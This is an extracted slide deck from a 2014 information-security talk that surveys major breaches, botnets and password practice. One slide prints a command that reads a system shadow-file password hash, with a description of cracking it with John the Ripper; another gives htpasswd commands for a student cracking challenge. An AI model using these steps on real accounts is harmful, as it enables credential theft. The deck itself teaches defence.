Top Banner
5/12/2014 How Safe is Your Data? 1/33 How Safe is Your Data? TAPPS 12 May 2014 Michael Soltys McMaster University / Executek
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Page 1: How Safe is your Data?

5/12/2014 How Safe is Your Data? 1/33

How Safe is Your Data?TAPPS12 May 2014

Michael SoltysMcMaster University / Executek

Page 2: How Safe is your Data?

5/12/2014 How Safe is Your Data? 2/33

Information Security

Key in a knowledge-based economy; key to safety: at a personal, organizational, and national level

As technology evolves, so do the threats

User behavior:

- choose good passwords

- update software regularly

- authenticate

Advanced practice:

- comes down to the unsolved problem of writing correct software

- Big data analytics

Page 3: How Safe is your Data?

5/12/2014 How Safe is Your Data? 3/33

Large scale attacks: U of Maryland

Attacks it can affect large numbers of people

In February 2014 the University of Maryland faced what it called a

"sophisticated cyber-attack"

which breached the records of more than 287,000 present and past students

Page 4: How Safe is your Data?

5/12/2014 How Safe is Your Data? 4/33

Large scale vulnerabilities: Heartbleed Bug

allows an attack to read the memory of a web server

affects all versions of OpenSSL in the 1.0.1 series up to and including 1.0.1f

the defect could be used to reveal up to 64 kilobytes of the application's memoryCVE-2014-0160

Canadian Revenue Agency (CRA) closed down its electronic services website overHeartbleed bug security concerns

OpenSSL validated under FIPS 140-2 by NIST!

(FIPS = Federal Information Processing Standards; NIST = National Institute of Standardsand Technology)

Page 5: How Safe is your Data?

5/12/2014 How Safe is Your Data? 5/33

New types of attacks

The field is not static; new attacks are clever and inventive:

Drive-by downloads: where a browsing reader can accidentally download roguecomputer programs.

Spear phishing: where specific individuals or organisations are targeted with fakeemails to obtain confidential information.

Watering Hole: about one in 20 attacks uses this strategy where rather than trying tobreak into an organisation's network directly, this targets other websites wherepeople might regularly visit, with the aim of infecting their computers and trying toget the unwitting carrier to bring a virus back into their own network.

Page 6: How Safe is your Data?

5/12/2014 How Safe is Your Data? 6/33

A typical attack: Malicious PDFs

In March 2014 a massive scam email was sent in Colombia, claiming to be from one ofthe country's credit score agencies

The email contained an attachment file. The file does not show malicious payload whenscanned by antimalware software.

However, doing a "stream dump" of the file we see:

Malicious scripting: which instructs the reader to execute the URL. After downloadingthe file shown in that URL, keylogger is downloaded.

Page 7: How Safe is your Data?

5/12/2014 How Safe is Your Data? 7/33

2011: A Bad Year

When the history of 2011 is written, it may well be remembered as the Year of the Hack.Stories of computer breaches were breaking almost every week:



the British National Health Service

and the Web sites of:


the U.S. Senate

and the C.I.A.

all fallen victim to highly publicized cyber-attacks. Many of the breaches have beenattributed to the groups Anonymous and LulzSec.

Page 8: How Safe is your Data?

5/12/2014 How Safe is Your Data? 8/33

Operation Shady Rat

Operation Shady rat ranks with Operation Aurora (the attack on Google and many other companies in 2010) as among the most significant and potentially damaging acts of cyber-espionage yet made public.

Operation Shady rat has been stealing valuable intellectual property (including government secrets, email archives, legal contracts, negotiation plans for business activities, and design schematics) from more than 70 public and private sector organizations in 14 countries.

The list of victims, which ranges from national governments to global corporations to tiny nonprofits, demonstrates with unprecedented clarity the universal scope of cyber-espionage and the vulnerability of organizations in almost every category imaginable.

Page 9: How Safe is your Data?

5/12/2014 How Safe is Your Data? 9/33

Operation Shady Rat

The vast majority of victims, 49, were U.S. based companies, government agencies, and nonprofits. The category most heavily targeted was defense contractors, 13 in all.

All the signs point to China.

Forensic investigation revealed that the defense contractor had been hit by a species of malware that had never been seen before: a spear-phishing email containing a link to a Web page that, when clicked, automatically loaded a malicious program, a remote access tool, or rat, onto the victim's computer.

The rat opened the door for a live intruder to get on the network, escalate user privileges, and begin exfiltrating data.

Page 10: How Safe is your Data?

5/12/2014 How Safe is Your Data? 10/33

Victims don't want to be victims

McAfee sent emails to officials at four organizations, informing them that their computer networks had been compromised.

Three of those organizations-including one whose breach is ongoing-made no response to McAfee's notifications.

"Victims don't want to know they're victims. Iguess that's just victim psychology: if youdon't know about it, it's not really happening." (

0:00  /  3:21

CNN  -­  Operation  Shady  RAT

Page 11: How Safe is your Data?

5/12/2014 How Safe is Your Data? 11/33

An innocuous click

RSA is the security division of the high-tech company EMC. Its products protect computer networks at the

White House

the Central Intelligence Agency

the National Security Agency

the Pentagon

the Department of Homeland Security,

as well as most top defense contractors, and a majority of Fortune 500 corporations.

Page 12: How Safe is your Data?

5/12/2014 How Safe is Your Data? 12/33

An innocuous click

Sometime in the winter of 2011, lying there in the junk-mail folder, in the spammy mess of mortgage offers and erectile-dysfunction drug ads, an email from an associate with a subject line that looked legit caught the man's eye.

The subject line said "2011 Recruitment Plan."

The man clicked on the message, downloaded the attached Excel spreadsheet file, and unwittingly set in motion a chain of events allowing hackers to raid the computer networks of his employer, RSA.

The parent company disclosed the breach on March 17, 2011, in a filing with the Securities and Exchange Commission. The hack gravely undermined the reputation of RSA's popular SecurID security service.

Page 13: How Safe is your Data?

5/12/2014 How Safe is Your Data? 13/33

An innocuous click

Experts found evidence that the attack on RSA had come from China.

They also linked the RSA attack to the penetration of computer networks at some of RSA's most powerful defense-contractor clients, among them:

Lockheed Martin, Northrop Grumman, L-3 Communications

Few details of these episodeshave been made public.


Page 14: How Safe is your Data?

5/12/2014 How Safe is Your Data? 14/33

Operation Aurora

in 2010 Google became the first major company to blow the whistle on Chinese hacking when it admitted to a penetration known as Operation Aurora, which also hit:


Morgan Stanley

and several dozen other corporations

Most companies have preferred not to talk about or even acknowledge violations of their computer systems, for fear of panicking shareholders and exposing themselves to lawsuits.

Or for fear of offending the Chinese and jeopardizing their share of that country's exploding markets.

Page 15: How Safe is your Data?

5/12/2014 How Safe is Your Data? 15/33

Operation Aurora

Chinese hackers who breachedGoogle's servers several yearsago gained access to a sensitivedatabase with years' worth ofinformation about U.S.surveillance targets, according tocurrent and former governmentofficials. (

The breach appears to have been aimed at unearthing the identities of Chinese

Page 16: How Safe is your Data?

5/12/2014 How Safe is Your Data? 16/33

Attempted logins

Page 17: How Safe is your Data?

5/12/2014 How Safe is Your Data? 17/33

Attempted logins





sub compute_ip {

$IP=`dig @_ +short`;

if ($IP) {

print "\t\t IP= $IP <br>";


else {

print "\t\t IP= ? <br> \n";



sub compute_location {

$country=`/sw/bin/geoiplookup @_`;

$country =~ m/([ A-Za-z]*)$/;

$country_short = $1;

if ($country_short) {

print "\t\t Country= $country_short <br>\n\n";


else {

print "\t\t Country= ? <br> \n\n";

Page 18: How Safe is your Data?

5/12/2014 How Safe is Your Data? 18/33

Esotnia 2007

In the Spring of 2007, government computer systems in Estonia experienced a sustained cyberattack (cyber-{warfare, terror, crime}).

On April 27, officials in Estonia moved a Soviet-era war memorial commemorating an unknown Russian who died fighting the Nazis. The move stirred emotions, and led to rioting by ethnic Russians, and the blockading of the Estonian Embassy in Moscow.

Page 19: How Safe is your Data?

5/12/2014 How Safe is Your Data? 19/33

Estonia 2007

The event marked the beginning of a series of large and sustained Distributed Denial-Of-Service (DDOS) attacks launched against several Estonian national websites.

In the early days of the cyberattack, government websites that normally receive around1,000 visits a day reportedly were receiving 2,000 visits every second. This caused therepeated shut down of some websites.

The cyberattacks against Estonia were unusual bec. the rate of the packet attack wasvery high, and the series of attacks lasted weeks, rather than hour or days, which ismore commonly seen for a DoS attack.

Eventually, NATO and the United States sent computer security experts to Estonia to help recover from the attacks, and to analyze the methods used and attempt to determine the source of the attacks. (

Page 20: How Safe is your Data?

5/12/2014 How Safe is Your Data? 20/33

Estonia 2007

A persistent problem during and after any cyberattack is accurate identification of the attacker:

was it sponsored by a nation?

was it the independent work of a few unconnected individuals?

was it initiated by a group to instill frustration and fear by damaging thecomputerized infrastructure and economy?

The uncertainty of not knowing the initiator also affects the decision about whom should ultimately become a target for retaliation, and whether the response should come from law enforcement or the military.

After some investigation, network analysts later concluded that the cyberattacks targeting Estonia were not a concerted attack, but instead were the product of spontaneous anger from a loose federation of separate attackers.

Page 21: How Safe is your Data?

5/12/2014 How Safe is Your Data? 21/33


Botnet = "Robot Network"

Botnets are made up of vast numbers of compromised computers that have beeninfected with malicious code, and can be remotely-controlled through commands sentvia the Internet.

Hundreds or thousands of these infected computers can operate in concert to:

disrupt or block Internet traffic for targeted victims

harvest information

distribute spam, viruses, or other malicious code.

Page 22: How Safe is your Data?

5/12/2014 How Safe is Your Data? 22/33


Botmasters can reportedly make large sums of money by marketing their technical services.

For example, Jeanson Ancheta, a 21-year-old hacker and member of a group called theBotmaster Underground, reportedly made more than $100,000 from different InternetAdvertising companies who paid him to download specially-designed malicious adwarecode onto more than 400,000 vulnerable PCs he had secretly infected and taken over.

He also made tens of thousands more dollars renting his 400,000-unit botnet herd toother companies that used them to send out spam, viruses, and other malicious codeon the Internet.

PPI: Pay-per-Install - The Commoditization of Malware Distribution

In 2006, Ancheta was sentenced to five years in prison (FBI operation Bot Roast).

Symantec reported that it detected 6 million bot-infected computers in the second halfof 2006.

Page 23: How Safe is your Data?

5/12/2014 How Safe is Your Data? 23/33


Some botnet owners reportedly rent their huge networks for US$200 to $300 an hour, and botnets are becoming the weapon of choice for fraud and extortion.

Newer methods are evolving for distributing bot software that may make it even more difficult in the future for law enforcement to identify and locate the originating botmaster.

Botnets organize themselves in an hierarchical manner, with a central command and control location (sometimes dynamic) for the botmaster.

This central command location is useful to security professionals because it offers a possible central point of failure for the botnet.

However, in the near future, attackers may use new botnet architectures that are more sophisticated, and more difficult to detect and trace, e.g., P2P.

Page 24: How Safe is your Data?

5/12/2014 How Safe is Your Data? 24/33

E.g., Wordpress

A fantastic piece of software for blogging; but consists of many parts:

MySQL; Apache; PHP; HTML; JavaScript; Mac OS X Server

absolutely essential to have the latest versions and strong password.

Page 25: How Safe is your Data?

5/12/2014 How Safe is Your Data? 25/33


Your password must be a minimum of 8 characters in length and must includecharacters from at least three of the four groups below:

Uppercase letters: A, B, C, ... ,Z

Lowercase letters: a, b, c, ...,z

Numerals: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9

Symbols: ~ ! @ # $ % ^ & * ( ) _ + ` - = { } | ] [ \ : " ; < > ? , . / '

Do not use any of your last five previous passwords.

Passwords cannot contain your account name or parts of your full name.

Generate with a seed, a name, and an MD5 hash generator

E.g., [email protected] use seed 5a63y@h& to obtain:

hash: ae19e19070a052b85306fc758146ef8e

Page 26: How Safe is your Data?

5/12/2014 How Safe is Your Data? 26/33

Uncovered during Executek audits

A client's computer we discovered that the data was kept in a Dropbox folder, and someone who was not supposed to see it had constant access to the latest version.

Most clients use dictionary passwords, never change them; sometimes they write them down on sticky notes placed on the monitor. Employees who leave keep passwords, which are not changed immediatelly, etc.

Software is seldom updated.

The server is secured but the backup module is not.

Page 27: How Safe is your Data?

5/12/2014 How Safe is Your Data? 27/33

Sophisticated attacks

Control hijacking attacks: exploits and defenses

Dealing with legacy code: sandboxing and isolation

Exploitation techniques and fuzzing

Tools for writing robust application code

Principle of least privilege, access control, and operating systems security

Security problems in network protocols: TCP, DNS, SMTP, and routing

Unwanted traffic: denial of service attacks

Page 28: How Safe is your Data?

5/12/2014 How Safe is Your Data? 28/33


Page 29: How Safe is your Data?

5/12/2014 How Safe is Your Data? 29/33

Apache Security

Apache HTTP server access:



The first file is the policy and the second the password:

AuthType Basic

AuthName "Networks & Security Readings 2014"

AuthUserFile cs3c03-w14/ReadingList/.htpasswd

require valid-user

The second file contains the username and a hash of the password; two examples:



Page 30: How Safe is your Data?

5/12/2014 How Safe is Your Data? 30/33

Apache Security Challenge

I tell my students that the first to break the first password, obtained with the command:

htpasswd -cbd ./.htpasswd nets2014 a5e1c054

gets extra marks. Note the password is not a dictionary word.

Still, it takes about 15min with, for example,


software. On the other hand, breaking the second password, obtained with the command:

htpasswd -cbm ./.htpasswd netsec2013 tigerblood

is practically impossible (crypt vs md5).

Page 31: How Safe is your Data?

5/12/2014 How Safe is Your Data? 31/33

Executek: Breaking into a Super-User account

Obtained the SHA1 hash of the password from "shadow file":

cat /private/ var/db/shadow/hash/[...] | cut -c 169-216

which turns out to be:


and then used:

John the Ripper

software to reverse engineer the password: onegod

it took about 20 minutes because the password was a dictionary word!

Page 32: How Safe is your Data?

5/12/2014 How Safe is Your Data? 32/33


CRS Report for Congress 2008 (

Vanity Fair: Operation Shady Rat 2011 (

Vanity Fair: Enter the Cyber-Dragon 2011 (

Malicious PDF (ISC) (

Networks Course Password Cracking Challenge (

Page 33: How Safe is your Data?

5/12/2014 How Safe is Your Data? 33/33

Thank you

Michael SoltysMcMaster University / [email protected] (mailto:[email protected]) (

@MichaelMSoltys (